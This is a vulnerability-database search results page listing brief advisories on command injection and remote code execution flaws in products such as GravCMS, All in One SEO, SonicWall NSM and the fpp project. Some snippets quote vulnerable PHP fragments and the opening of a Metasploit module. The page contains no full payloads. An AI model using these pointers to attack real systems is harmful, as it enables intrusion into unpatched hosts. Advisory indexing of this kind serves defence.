Lucene search
K

1227 matches found

CNNVD
CNNVD
added 2021/07/08 12:0 a.m.4 views

Aruba ClearPass Policy Manager 命令注入漏洞

Aruba ClearPass Policy Manager is an application from Aruba, Inc. that provides a wireless network security access management system. Aruba ClearPass Policy Manager suffers from a command injection vulnerability that originates from the product not doing security checks on user input data, which...

6.5CVSS5.9AI score0.01246EPSS
Exploits0References1
Huntr
Huntr
added 2021/05/29 4:59 p.m.9 views

OS Command Injection in falconchristmas/fpp

✍️ Description Hi, it is possible to inject arbitrary OS commands in https://github.com/FalconChristmas/fpp/blob/59b7f7e8039a7019143c2c4b44f7d95b6358a4ef/www/formatstorage.phpL24 php &1"; echo "Command: $command\n"; echo...

1.6AI score
Exploits0
CNNVD
CNNVD
added 2021/05/27 12:0 a.m.4 views

SonicWall NSM On-Prem 操作系统命令注入漏洞

SonicWall NSM On-Prem is an application from Sonicwall USA, Inc. It provides unlimited scalability to support thousands of SonicWall security appliances under its management. SonicWall NSM On-Prem suffers from an operating system command injection vulnerability that can be exploited by an attacke...

9CVSS5.8AI score0.11642EPSS
Exploits1References2
NVD
NVD
added 2021/05/24 11:15 a.m.15 views

CVE-2021-24307

The All in One SEO – Best WordPress SEO Plugin – Easily Improve Your SEO Rankings before 4.1.0.2 enables authenticated users with "aioseotoolssettings" privilege most of the time admin to execute arbitrary code on the underlying host. Users can restore plugin's configuration by uploading a backup...

9CVSS0.53274EPSS
Exploits3References2
Prion
Prion
added 2021/05/24 11:15 a.m.24 views

Design/Logic Flaw

The All in One SEO – Best WordPress SEO Plugin – Easily Improve Your SEO Rankings before 4.1.0.2 enables authenticated users with "aioseotoolssettings" privilege most of the time admin to execute arbitrary code on the underlying host. Users can restore plugin's configuration by uploading a backup...

9CVSS8.9AI score0.53274EPSS
Exploits3References2Affected Software1
Huntr
Huntr
added 2021/05/12 2:33 p.m.10 views

OS Command Injection in falconchristmas/fpp

✍️ Description In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/runEventScript.phpL32 a command is built using unsanitized user input : php \n"; echo "\n"; system$SUDO . " $fppDir/scripts/eventScript $scriptDirectory/$script $args"; // scripts and args ar...

0.3AI score
Exploits0
wpexploit
wpexploit
added 2021/05/09 12:0 a.m.1277 views

All in One SEO Pack < 4.1.0.2 - Admin RCE via unserialize

The plugin enables authenticated users with "aioseotoolssettings" privilege most of the time admin to execute arbitrary code on the underlying host. Users can restore plugin's configuration by uploading a backup .ini file in the section "Tool Import/Export". However, the plugin attempts to...

9CVSS0.3AI score0.53274EPSS
Exploits3References1
Metasploit
Metasploit
added 2021/05/04 5:41 p.m.85 views

GravCMS Remote Command Execution

This module exploits arbitrary config write/update vulnerability to achieve remote code execution. Unauthenticated users can execute a terminal command under the context of the web server user. Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify...

9.8CVSS9.4AI score0.80467EPSS
Exploits12
0day.today
0day.today
added 2021/05/04 12:0 a.m.79 views

GravCMS 1.10.7 Remote Command Execution Exploit

This Metasploit module exploits an arbitrary config write/update vulnerability to achieve remote code execution. Unauthenticated users can execute a terminal command under the context of the web server user. Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and...

9.8CVSS0.3AI score0.80467EPSS
Exploits12
CNNVD
CNNVD
added 2021/04/29 12:0 a.m.7 views

China Mobile An Lianbao WF-1 router 操作系统命令注入漏洞

China Mobile An Lianbao WF-1 router is a router from China Mobile China. China Mobile An Lianbao WF-1 router 1.0.1 suffers from an operating system command injection vulnerability, which originates in the api/ZRFirmware/settimezone set time zone interface, that can be exploited by remote attacker...

9.8CVSS8.9AI score0.0327EPSS
Exploits1References4
Packet Storm
Packet Storm
added 2021/04/21 12:0 a.m.321 views

GravCMS 1.10.7 Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'GravCMS Remote Command Execution', 'Description' = %q This module exploits arbitrary config write/update vulnerability to achieve remote code...

0.4AI score0.80467EPSS
Exploits12
VulnCheck KEV
VulnCheck KEV
added 2021/04/13 12:0 a.m.3 views

VulnCheck KEV: CVE-2021-27104

Accellion FTA contains an OS command injection vulnerability exploited via a crafted POST request to various admin endpoints...

10CVSS7.5AI score0.56686EPSS
Exploits0References1
Cvelist
Cvelist
added 2021/04/07 6:20 p.m.40 views

CVE-2021-21425 Unauthenticated Arbitrary YAML Write/Update leads to Code Execution

Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages. In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without needing any credentials. Particular method execution will result in...

9.3CVSS9.7AI score0.80467EPSS
Exploits12References4
Exploit DB
Exploit DB
added 2021/03/19 12:0 a.m.259 views

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution

Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution Date: 03.02.2021 Exploit Author: LiquidWorm Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web pag...

7.4AI score
Exploits0
NVD
NVD
added 2021/03/15 7:15 p.m.13 views

CVE-2020-29553

The Scheduler in Grav CMS through 1.7.0-rc.17 allows an attacker to execute a system command by tricking an admin into visiting a malicious website CSRF...

8.8CVSS0.01361EPSS
Exploits1References1
OSV
OSV
added 2021/03/15 7:15 p.m.14 views

CVE-2020-29553

The Scheduler in Grav CMS through 1.7.0-rc.17 allows an attacker to execute a system command by tricking an admin into visiting a malicious website CSRF...

8.8CVSS8.8AI score0.02899EPSS
Exploits3References1
Cvelist
Cvelist
added 2021/03/15 6:20 p.m.13 views

CVE-2020-29553

The Scheduler in Grav CMS through 1.7.0-rc.17 allows an attacker to execute a system command by tricking an admin into visiting a malicious website CSRF...

8.8AI score0.01361EPSS
Exploits1References1
UbuntuCve
UbuntuCve
added 2021/03/10 8:15 a.m.37 views

CVE-2020-13936

An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache...

9CVSS7AI score0.22709EPSS
Exploits0References8
CVE
CVE
added 2021/03/10 8:0 a.m.539 views

CVE-2020-13936

CVE-2020-13936 affects Apache Velocity, where modifying Velocity templates can bypass the sandbox and allow remote code execution with the container’s privileges. Engine versions affected include up to 2.2; IBM and related advisories flag this as a Velocity sandbox bypass leading to arbitrary cod...

9CVSS8.9AI score0.22709EPSS
Exploits0References23Affected Software2
ATTACKERKB
ATTACKERKB
added 2021/03/01 12:0 a.m.44 views

CVE-2021-27878

An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to ga...

9CVSS9.7AI score0.23952EPSS
In wildExploits4References3
Rows per page
Query Builder